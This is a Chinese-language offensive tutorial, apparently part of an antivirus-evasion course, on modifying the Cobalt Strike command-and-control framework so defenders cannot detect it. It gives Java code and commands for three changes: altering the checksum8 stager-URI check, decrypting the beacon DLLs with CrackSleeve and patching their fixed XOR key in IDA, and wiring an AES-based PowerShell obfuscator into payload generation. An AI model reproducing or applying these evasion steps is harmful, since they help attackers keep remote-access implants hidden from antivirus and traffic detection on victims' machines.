安全工具篇&魔改二开&CheckSum8算法&Beacon密钥&Stager流量&生成机制

免杀对抗------第一百六十四天

安全工具篇&魔改二开&CheckSum8算法&Beacon密钥&Stager流量&生成机制

前置知识

• 上节课我们对CS进行了简单的魔改操作，但是这些操作基本对流量识别影响不大，因此我们本节课会继续深入进行改动，包括修改Checksum8算法、Beacon密钥以及混淆算法融入等

安全工具 - CS魔改二开-Checksum8算法

• 首先是Checksum8算法，它的计算逻辑上节课也讲过：ASCII码之和 % 256，在CS当中，如果是64位木马那么checksum8的值为93，如果是32位木马那么值为92，因此在默认的CS当中，不管流量包怎么变化，只要第一个数据包中GET请求路径checksum8算法值为这两个，那么基本可以确定是CS远控通道
• 因此如果我们要对其进行免杀，首当其冲地就是改动这个特征，在cloudstrike/WebServer.java文件中的这个方法：

// checksum8算法实现
public static long checksum8(String text) {  
   if (text.length() < 4) {  
      return 0L;  
   } else {  
      text = text.replace("/", "");  
      long sum = 0L;  
  
      for(int x = 0; x < text.length(); ++x) {  
         sum += (long)text.charAt(x);  
      }  
  
      return sum % 256L;  
   }  
}

// 判断是64位还是32位木马
public static boolean isStager(String uri) {  
   return checksum8(uri) == 92L;  
}  
  
public static boolean isStagerX64(String uri) {  
   return checksum8(uri) == 93L && uri.matches("/[A-Za-z0-9]{4}");  
}

• 可以看到checksum8算法中要满足url长度大于4，然后经过该算法结果为92或者93，那么我们这里就有两种思路：

  1. 不改动算法，改动路径checksum8计算后的返回值来判断木马类型
  2. 改动算法，重新根据新的算法来判断木马类型

• 当然前者可能需要大量的改动并且不一定成功，所以我们选择后者，假设我们设定路径为index.jsp为64位木马第一个GET请求包，设定login.jsp为32位木马第一个GET请求包，那么返回值就为147和148：
  

• 所以我们修改isStagerX64()方法的判定值为147L，修改isStager()方法的判定值为148L：
  

• 此外，我们还需要修改common/CommonUtils中的MSFURL()和MSFURL_X64()两个方法的返回值，强制等于我们给定的两个请求路径：
  

• 当然这里它的逻辑是随机生成后续的URL路径，所以这里我们其实可以弄得更加随机化一点，不过主要是为了演示效果，所以就强制返回固定值了

• 改完之后我们重新打包构建，然后上线执行看看数据包：
  

• 可以看到这里确实改动了，但是服务端返回的是404，所以这里尤其要注意需要将服务端的jar包替换成当前改动后的才行：
  

• 成功上线，并且之前的checksum8算法特征也改动了，同样32位这里也能够正常上线：
  

• 随机化的路径：
  

安全工具 - CS魔改二开-Beacon默认密钥

• 参考文章：CobaltStrike魔改与增强
• 首先我们要了解由Windows Execute模块生成的就是Stager，它的上线逻辑如下：

运行EXE -> 自动生成并访问符合checksum8校验的URI进行远程下载Stager -> 上线

• 因此在这个过程中由两个特征会被捕获到：
  1. URL的checksum8规则
  2. 访问URL下载解析Stager
• 关于第一个特征我们已经解决了，那关于第二个特征就是默认的stager文件它是通过XOR加密的，被下载下来之后解密然后上线
• 而这个加密密钥是固定的，如果采用默认密钥就会导致被文件在落地之前被杀毒软件解密识别，因此无法落地
• 在CS不同版本中，异或密钥是不同的，但都是固定的值：
  • CS 3.x版本的配置信息是通过异或0x69解密出来的
  • CS 4.x版本的配置信息是通过异或0x2e解密出来的
• 其实就是什么呢？有的杀毒软件它是具有流量特征识别的功能比如卡巴和DF，因此这类杀软它可能就会对这个stager文件进行扫描识别然后杀掉
• 可以通过这个工具自行解析看看：Sentinel-One/CobaltStrikeParser
• 第一步我们需要改动sleeve/beacon.dll和sleeve/beacon64.dll这两个文件，这就是stager文件的原型
• 而这两个文件是被加密的，所以我们要通过网上脚本先进行解密，流程如下：

32位：beacon.dll --解密-->  beacon.dll --异或--> UJQm...stager文件

64位：beacon.dll --解密-->  beacon.dll --异或--> UJQm...stager文件

• 解密脚本在这里：
  1. 4.0~4.5：https://github.com/GH-H4d35/CrackSleeve
  2. 4.7：https://github.com/kyxiaxiang/CrackSleeve4.7
  3. 4.8：https://github.com/kyxiaxiang/CrackSleeve4.8
  4. 4.9：https://github.com/kyxiaxiang/CrackSleeve4.9
• 下载下来之后，先将打包好的jar包放到当前目录，然后通过如下命令解密：

javac -encoding UTF-8 -classpath cobaltstrike.jar CrackSleeve.java
java -classpath "cobaltstrike.jar;./" CrackSleeve decode

• 解密完成之后，以64位为例，我们找到beacon64.dll文件，然后用IDA打开，shift+B找到xor 0x2e这里：
  

• 然后通过Edit->Patch program->Change byte...，然后将这里的2E改为自定义的值：
  

• 保存之后将beacon/BeaconPayload.java代码中这里改成其十进制数：
  

• 再通过刚才的工具将新的dll文件加密回去之后再替换sleeve/beacon64.dll文件：

java -classpath "cobaltstrike.jar;./" CrackSleeve encode

• 打包编译完成之后记得替换服务端的jar包，然后运行64位的木马看看新的stager文件是否能被刚才的工具解析出来：
  

• 可以看到现在解不出来了，所以说我们的改动是有效果的，不过卡巴依旧杀，所以我们还需进一步改动，比如二次异或、换加密算法等等

安全工具 - CS魔改二开-PowerShell混淆融入

• 最后我们来看一下关于Powershell的混淆免杀，之前我们已经讲过了手动去调用工具进行混淆，而这里我们可以改动代码让CS在生成.ps1文件时就自动生成免杀的脚本
• 那有三种方式：一种是直接将免杀后的脚本替换resources/template.x64.ps1默认的文件；一种是调用在生成之前调用第三方工具进行混淆；一种是自己写一个混淆函数调用
• 我们这里看看第二种，找到common/ResourceUtils.java文件，然后在它创建ps1文件之前调用我们之前的工具，代码如下：

public byte[] _buildPowerShellNoHint(byte[] var1, String var2) throws IOException, InterruptedException {
	String command = "powershell -Command Import-Module ./AES-Encoder.ps1;Invoke-AES-Encoder -InFile template.x64.ps1 -OutFile x64.ps1 -Iterations 6"; // 这里是你要执行的命令
	Process process = Runtime.getRuntime().exec(command);
	
	// 读取命令输出
	InputStream inputStream = process.getInputStream();
	BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
	String line;
	while ((line = reader.readLine()) != null) {
		System.out.println(line);
	}
	
	// 等待命令执行完成
	int exitCode = process.waitFor();
	System.out.println("命令执行完毕，退出码：" + exitCode);
	
	// 关闭流
	inputStream.close();
	reader.close();
	
	InputStream var3 = CommonUtils.resource("x64.ps1");
	byte[] var4 = CommonUtils.readAll(var3);
	var3.close();
	String var5 = CommonUtils.bString(var4);
	byte[] var6 = new byte[]{35};
	var1 = CommonUtils.XorString(var1, var6);
	var5 = CommonUtils.strrep(var5, "%%DATA%%", Base64.encode(var1));
	return CommonUtils.toBytes(var5);
}

• 这里记得将AES-Encoder.ps1和template.x64.ps1文件放到根目录下，这样在我们生成powershell文件的时候就会生成混淆之后的脚本了：